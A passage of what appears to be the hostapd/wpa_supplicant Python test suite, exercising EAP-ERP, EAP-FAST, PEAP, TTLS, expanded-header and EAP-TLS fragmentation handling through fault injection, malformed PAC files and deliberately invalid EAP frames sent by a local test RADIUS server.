return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV keyName-NAI")
payload = struct.pack("BB", EAP_ERP_TLV_KEYNAME_NAI, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid rRK lifetime TV followed by too short rMSK lifetime TV")
payload = struct.pack(">BLBH", EAP_ERP_TV_RRK_LIFETIME, 0,
EAP_ERP_TV_RMSK_LIFETIME, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type (Finish)")
return struct.pack(">BBH", EAP_CODE_FINISH, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing fields (Finish)")
return struct.pack(">BBHB", EAP_CODE_FINISH, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SEQ (Finish)")
return struct.pack(">BBHBBHB", EAP_CODE_FINISH, ctx['id'],
4 + 1 + 4,
EAP_ERP_TYPE_REAUTH, 0, 0xffff, 0)
logger.info("No more test responses available - test case completed")
global eap_proto_erp_test_done
eap_proto_erp_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(erp_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_erp_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
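# EAP-FAST (RFC 4851) local error cases: alloc_fail()/fail_test() target
# PAC handling, crypto binding derivation, and TLV processing, and a set
# of intentionally malformed PAC file blobs exercises the PAC parser.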
def test_eap_proto_fast_errors(dev, apdev):
"""EAP-FAST local error cases"""
check_eap_capa(dev[0], "FAST")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_fast_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "wpabuf_alloc;eap_fast_tlv_eap_payload"),
(1, "eap_fast_derive_key;eap_fast_derive_key_auth"),
(1, "eap_msg_alloc;eap_peer_tls_phase2_nak"),
(1, "wpabuf_alloc;eap_fast_tlv_result"),
(1, "wpabuf_alloc;eap_fast_tlv_pac_ack"),
(1, "=eap_peer_tls_derive_session_id;eap_fast_process_crypto_binding"),
(1, "eap_peer_tls_decrypt;eap_fast_decrypt"),
(1, "eap_fast_getKey"),
(1, "eap_fast_get_session_id"),
(1, "eap_fast_get_emsk") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_auth_errors ")
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user@example.com", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_fast_derive_key;eap_fast_derive_key_provisioning"),
(1, "eap_mschapv2_getKey;eap_fast_get_phase2_key"),
(1, "=eap_fast_use_pac_opaque"),
(1, "eap_fast_copy_buf"),
(1, "=eap_fast_add_pac"),
(1, "=eap_fast_init_pac_data"),
(1, "=eap_fast_write_pac"),
(2, "=eap_fast_write_pac") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_errors ")
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_fast_get_cmk;eap_fast_process_crypto_binding"),
(1, "eap_fast_derive_eap_msk;eap_fast_process_crypto_binding"),
(1, "eap_fast_derive_eap_emsk;eap_fast_process_crypto_binding") ]
for count, func in tests:
dev[0].request("SET blob fast_pac_auth_errors ")
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_auth_errors",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].request("SET blob fast_pac_errors ")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
# EAP-FAST: Only EAP-MSCHAPv2 is allowed during unauthenticated
# provisioning; reject phase2 type 6
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
logger.info("Wrong password in Phase 2")
dev[0].request("SET blob fast_pac_errors ")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="wrong password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "FOOBAR\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nFOOBAR\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nSTART\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Type=12345\nEND\n"
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=12\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1q\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Opaque=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nI-ID=1\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID-Info=1\nEND\n" ]
for pac in tests:
blob = binascii.hexlify(pac)
dev[0].request("SET blob fast_pac_errors " + blob)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_errors",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\n",
"wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\nSTART\nEND\nSTART\nEND\n" ]
for pac in tests:
blob = binascii.hexlify(pac)
dev[0].request("SET blob fast_pac_errors " + blob)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
phase1="fast_provisioning=2",
pac_file="blob://fast_pac_errors")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].request("SET blob fast_pac_errors ")
def test_eap_proto_peap_errors(dev, apdev):
"""EAP-PEAP local error cases"""
check_eap_capa(dev[0], "PEAP")
check_eap_capa(dev[0], "MSCHAPV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_peap_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_mschapv2_getKey;eap_peap_get_isk;eap_peap_derive_cmk"),
(1, "eap_msg_alloc;eap_tlv_build_result"),
(1, "eap_mschapv2_init;eap_peap_phase2_request"),
(1, "eap_peer_tls_decrypt;eap_peap_decrypt"),
(1, "wpabuf_alloc;=eap_peap_decrypt"),
(1, "eap_peer_tls_encrypt;eap_peap_decrypt"),
(1, "eap_peer_tls_process_helper;eap_peap_process"),
(1, "eap_peer_tls_derive_key;eap_peap_process"),
(1, "eap_peer_tls_derive_session_id;eap_peap_process"),
(1, "eap_peap_getKey"),
(1, "eap_peap_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
phase1="peapver=0 crypto_binding=2",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "peap_prfplus;eap_peap_derive_cmk"),
(1, "eap_tlv_add_cryptobinding;eap_tlv_build_result"),
(1, "peap_prfplus;eap_peap_getKey") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="user", password="password",
phase1="peapver=0 crypto_binding=2",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1,
"eap_peer_tls_phase2_nak;eap_peap_phase2_request"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PEAP", anonymous_identity="peap",
identity="cert user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
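# EAP-TTLS (RFC 5281) local error cases covering every Phase 2 variant
# used below: MSCHAPV2, MSCHAP, CHAP, PAP, and tunneled EAP
# (autheap=MSCHAPV2).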
def test_eap_proto_ttls_errors(dev, apdev):
"""EAP-TTLS local error cases"""
check_eap_capa(dev[0], "TTLS")
check_eap_capa(dev[0], "MSCHAPV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_ttls_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="user", password="password",
ca_cert="auth_serv/ca.pem",
phase2="autheap=MSCHAPV2",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_peer_tls_derive_key;eap_ttls_v0_derive_key",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_derive_session_id;eap_ttls_v0_derive_key",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_mschapv2",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschapv2",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_implicit_identity_request",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_peer_tls_decrypt;eap_ttls_decrypt",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_getKey",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_get_session_id",
"DOMAIN\mschapv2 user", "auth=MSCHAPV2"),
(1, "eap_ttls_get_emsk",
"mschapv2 user@domain", "auth=MSCHAPV2"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_mschap",
"mschap user", "auth=MSCHAP"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschap",
"mschap user", "auth=MSCHAP"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_chap",
"chap user", "auth=CHAP"),
(1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_chap",
"chap user", "auth=CHAP"),
(1, "wpabuf_alloc;eap_ttls_phase2_request_pap",
"pap user", "auth=PAP"),
(1, "wpabuf_alloc;eap_ttls_avp_encapsulate",
"user", "autheap=MSCHAPV2"),
(1, "eap_mschapv2_init;eap_ttls_phase2_request_eap_method",
"user", "autheap=MSCHAPV2"),
(1, "eap_sm_buildIdentity;eap_ttls_phase2_request_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_avp_encapsulate;eap_ttls_phase2_request_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_parse_attr_eap",
"user", "autheap=MSCHAPV2"),
(1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_process_decrypted",
"user", "autheap=MSCHAPV2"),
(1, "eap_ttls_fake_identity_request",
"user", "autheap=MSCHAPV2"),
(1, "eap_msg_alloc;eap_tls_process_output",
"user", "autheap=MSCHAPV2"),
(1, "eap_msg_alloc;eap_peer_tls_build_ack",
"user", "autheap=MSCHAPV2"),
(1, "tls_connection_decrypt;eap_peer_tls_decrypt",
"user", "autheap=MSCHAPV2"),
(1, "eap_peer_tls_phase2_nak;eap_ttls_phase2_request_eap_method",
"cert user", "autheap=MSCHAPV2") ]
for count, func, identity, phase2 in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity=identity, password="password",
ca_cert="auth_serv/ca.pem", phase2=phase2,
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
note="Allocation failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_ttls_phase2_request_mschapv2"),
(1, "mschapv2_derive_response;eap_ttls_phase2_request_mschapv2") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="DOMAIN\mschapv2 user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="Test failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "nt_challenge_response;eap_ttls_phase2_request_mschap") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TTLS", anonymous_identity="ttls",
identity="mschap user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAP",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="Test failure not triggered for: %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
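# The expanded EAP header (RFC 3748, type 254) is the type octet
# followed by a 3-octet Vendor-Id and a 4-octet Vendor-Type. With
# Vendor-Id 0 (IETF), the Vendor-Type carries a legacy method number,
# which is how MD5 and MSCHAPv2 are wrapped below.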
def test_eap_proto_expanded(dev, apdev):
"""EAP protocol tests with expanded header"""
global eap_proto_expanded_test_done
eap_proto_expanded_test_done = False
def expanded_handler(ctx, req):
logger.info("expanded_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge in expanded header")
return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 3,
EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded EAP length")
return struct.pack(">BBHB3BH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded frame type")
return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MD5)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MSCHAPv2 Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid expanded frame type")
return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MSCHAPV2)
logger.info("No more test responses available - test case completed")
global eap_proto_expanded_test_done
eap_proto_expanded_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(expanded_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_expanded_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
if i == 4:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password",
wait_connect=False)
else:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 1 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
elif i in [ 2, 3 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP proposed method")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
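# EAP-TLS (RFC 5216) Flags octet: 0x80 = L (TLS Message Length field
# included), 0x40 = M (more fragments), 0x20 = S (TLS start); the
# handler below mixes these bits (e.g., 0xe0 = L|M|S) to probe the
# fragment reassembly code.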
def test_eap_proto_tls(dev, apdev):
"""EAP-TLS protocol tests"""
check_eap_capa(dev[0], "TLS")
global eap_proto_tls_test_done, eap_proto_tls_test_wait
eap_proto_tls_test_done = False
eap_proto_tls_test_wait = False
def tls_handler(ctx, req):
logger.info("tls_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_tls_test_wait
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too much payload in TLS/Start: TLS Message Length (0 bytes) smaller than this fragment (1 bytes)")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xa0, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS/Start")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xe0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragment of TLS/Start: Invalid reassembly state: tls_in_left=2 tls_in_len=0 in_len=0")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TLS, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TLS message: no Flags octet included + workaround")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TLS)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragment of TLS message: more data than TLS message length indicated")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_TLS, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS/Start and truncated Message Length field")
return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_TLS, 0xe0, 1, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TLS, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid TLS message: no Flags octet included + workaround disabled")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TLS)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message (long; first)")
payload = 1450*'A'
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + len(payload),
EAP_TYPE_TLS, 0xc0, 65536) + payload
# "Too long TLS fragment (size over 64 kB)" on the last one
for i in range(44):
idx += 1
if ctx['num'] == idx:
logger.info("Test: Fragmented TLS message (long; cont %d)" % i)
eap_proto_tls_test_wait = True
payload = 1470*'A'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_TYPE_TLS, 0x40) + payload
eap_proto_tls_test_wait = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TLS/Start")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TLS, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-ACK to more-fragment message")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_TLS, 0x00, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("No more test responses available - test case completed")
global eap_proto_tls_test_done
eap_proto_tls_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(tls_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_tls_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
workaround = "0" if i == 6 else "1"
fragment_size = "100" if i == 8 else "1400"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ca.pem",
client_cert="auth_serv/user.pem",
private_key="auth_serv/user.key",
eap_workaround=workaround,
fragment_size=fragment_size,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
"CTRL-EVENT-EAP-STATUS"], timeout=5)
if ev is None:
raise Exception("Timeout on EAP method start")
time.sleep(0.1)
start = os.times()[4]
while eap_proto_tls_test_wait:
now = os.times()[4]
if now - start > 10:
break
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
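# EAP-TNC carries IF-TNCCS (XML) batches; its Flags octet uses
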